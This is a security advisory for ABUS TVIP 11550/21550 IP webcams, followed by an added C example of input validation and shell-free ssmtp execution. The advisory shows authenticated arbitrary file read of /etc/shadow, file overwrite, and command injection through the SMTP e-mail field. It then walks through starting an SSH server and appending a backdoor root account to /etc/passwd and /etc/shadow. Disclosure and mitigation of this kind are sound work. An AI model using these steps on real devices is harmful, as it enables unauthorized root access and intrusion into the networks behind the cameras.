
ABUS TVIP 11550/21550 File Read / File Upload / Command Execution

12 Oct 2011 | Reported by Marco van Berkum | Type: packetstorm | Source: packetstormsecurity.com

Multiple vulnerabilities in the ABUS TVIP 11550/21550 IP webcams, including arbitrary file read, file upload, and command execution, allow root access to the cameras' Debian Linux operating system.

Code
`Title : ABUS TVIP 11550/21550 Multiple vulnerabilities (and possibly other ABUS cams)
Author : Marco van Berkum  
  
- Summary  
- Arbitrary file read  
- Arbitrary file upload  
- Arbitrary command execution (input validation bug)
- How it's totally compromised including ssh root login.  
  
- Summary  
  
The ABUS 11550 and 21550 are IP webcams that can be configured via a web
interface. While experimenting, multiple vulnerabilities were discovered that
give root access to the operating system, Debian Linux, of the camera. The
webserver of the camera is BOA and runs as root.

Although these vulnerabilities can ONLY be exploited when logged in as admin,
they can still be considered critical since the camera can be used to gain
access to the network behind it. I did not find a way past the login screen
without proper credentials (yet).
  
- Arbitrary file read  
  
When logged in as admin it's possible to read any file on the filesystem since
the webserver is running as root.
  
http://ipcamera/cgi-bin/admin/fileread?READ.filePath=/etc/shadow  
  
- Arbitrary file upload  
  
Similar to the fileread CGI there is also a filewrite CGI that can (over)write
any file.
  
http://ipcamera/cgi-bin/admin/filewrite?SAVE.filePath=/tmp/file%26SAVE  
  
- Arbitrary command execution (input validation bug)  
  
The camera has several HTML forms to configure services such as an FTP client
and an SMTP client. These are used to notify users and upload videos when the
camera's motion detection detects movement. These HTML forms can be used to
execute arbitrary commands as root. I've found bugs in the SMTP and FTP forms
but probably other forms will contain the same bug (unchecked).
  
Exploit:  
In the configuration -> smtp general part is a web form where an
administrator's e-mail address can be filled out (Administrator e-Mail address).
The form does not check for metacharacters such as ;, | and `.
When a test e-mail is sent from this form the web interface executes ssmtp -t
<your_input>.
So it is possible to 'break' the commandline by using `ls` for instance. After
submitting the command via the 'testbutton' this will be the output:
  
smtp: Connect to host  
  
smtp: MAIL FROM:<backup>  
SMTP server error  
................SMTP Test Failed...........  
  
Which means we are situated in a directory that contains a backup directory.  
  
`pwd` also works  
  
smtp: Connect to host  
  
smtp: MAIL FROM:</opt/cgi/admin>  
SMTP server error  
................SMTP Test Failed...........  
  
Unfortunately this only outputs the first line of the commandline output.  
But, we can work around this :)  
  
The system also contains a System Log function that shows the output of the
system log. Now, if we want a little more output than just the first line, for
instance "ls /", we can do it by filling out `ls /|logger`, which sends the
output to the system logfile, which can then be viewed from the web interface.
  
Oct 8 14:35:15 <notice > root: bin  
Oct 8 14:35:15 <notice > root: dev  
Oct 8 14:35:15 <notice > root: etc  
Oct 8 14:35:15 <notice > root: include  
Oct 8 14:35:15 <notice > root: init  
Oct 8 14:35:15 <notice > root: lib  
Oct 8 14:35:15 <notice > root: linuxrc  
Oct 8 14:35:15 <notice > root: mnt  
Oct 8 14:35:15 <notice > root: opt  
Oct 8 14:35:15 <notice > root: proc  
Oct 8 14:35:15 <notice > root: root  
Oct 8 14:35:15 <notice > root: sbin  
Oct 8 14:35:15 <notice > root: smtp_test.sh  
Oct 8 14:35:15 <notice > root: sys  
Oct 8 14:35:15 <notice > root: tag_replace.sh  
Oct 8 14:35:15 <notice > root: tmp  
Oct 8 14:35:15 <notice > root: usr  
Oct 8 14:35:15 <notice > root: var  
Oct 8 14:35:15 <notice > root: web  
  
The correct commandline output can also be obtained by redirecting it to a
readable file on the webserver itself by doing
`ls -alR />/web/html/lsoutput.txt`
It can then be accessed by the url http://ipcamera/lsoutput.txt
  
- How it's totally compromised including ssh root login.  
  
I did it in a few steps. First I did a `ls -alR />/web/html/lsoutput.txt` to
see what was on the filesystem and noticed that dropbear is available on the
system. Dropbear is an SSH server/client :)
So, I started it with the `/etc/dropbear/dropbear` command.

Then I took a look at the /etc/shadow file and noticed that user root had
no password, so ssh'ing in was not an option, yet. So I had to create a user;
I did it the following way:
  
`echo "test:x:0:0:test:/tmp:/bin/sh">>/etc/passwd`  
and  
`echo "test:$1$/DqZS5Cm$PUeCTPpYIrGQnxsZtsfDY1:12963:0:99999:7:::">>/etc/shadow`
  
So, now we can log in as user test with password test. User test has UID 0,
thus root.
  
test@ipcamera's password:  
Welcome to  
  
_____ __ ___ __ ___ _ _ _  
| ___| / \ / __ \ / \ | _ \ / \ \ \ / /  
| |___ / /\ \ | /__\ \ / /\ \ | | \ | / /\ \ \ V /  
| ___|| |__| | | _ / | |__| | | | | | | |__| | \ /  
| | | __ | | | \ \ | __ | | |_/ / | __ | | |  
|_| |_| |_| |_| \_\|_| |_| |___ / |_| |_| |_|  
  
For further information check:  
http://www.GM.com/  
  
  
  
BusyBox v1.1.3 (2010.05.10-11:54+0000) Built-in shell (ash)  
Enter 'help' for a list of built-in commands.  
  
[test]#  
  
Voila ;)  
  
Also, it's possible to mount a samba or NFS share via the web interface and
copy files that way.
  
Just my two cents  
Marco van Berkum
  
  
  
`
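
The command execution described above arises because the Administrator e-Mail field reaches a shell command line unchecked. The following C code is an added example, not code from the advisory or from the camera firmware: it shows how a CGI handler could validate the address against an allow-list and start ssmtp through an argv array so no shell ever parses the input. The function names and the `/usr/sbin/ssmtp` path are assumptions.

```c
#include <ctype.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define SSMTP_PATH "/usr/sbin/ssmtp"   /* assumed install path */

/* Allow-list check: 1 if addr is a plain local@domain string, else 0.
 * Only [A-Za-z0-9._+-] and a single '@' are accepted, which refuses
 * ; | ` $ ( ) < > & quotes, whitespace and newlines. */
int mail_address_ok(const char *addr)
{
    size_t len, i, at = 0, n_at = 0;

    if (addr == NULL) return 0;
    len = strlen(addr);
    if (len < 3 || len > 254) return 0;
    if (addr[0] == '-') return 0;      /* would be parsed as an option */
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (c == '@') { n_at++; at = i; continue; }
        if (!isalnum(c) && c != '.' && c != '_' && c != '+' && c != '-')
            return 0;
    }
    return n_at == 1 && at > 0 && at < len - 1;
}

/* Runs "ssmtp -t <addr>" via execv: addr is one argv element and is never
 * interpreted by a shell. The message is expected on the inherited stdin.
 * Returns the child's exit status, or -1 if addr is refused or on error. */
int send_test_mail(const char *addr)
{
    pid_t pid;
    int status;

    if (!mail_address_ok(addr)) return -1;
    if ((pid = fork()) < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "ssmtp", "-t", (char *)addr, NULL };
        execv(SSMTP_PATH, argv);
        _exit(127);                    /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{ return (argc == 2 && send_test_mail(argv[1]) == 0) ? 0 : 1; }
```

Validation and shell-free execution are independent layers: either one alone stops the metacharacter input shown in the advisory, and running the web server as an unprivileged user would limit the impact of any remaining bug.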
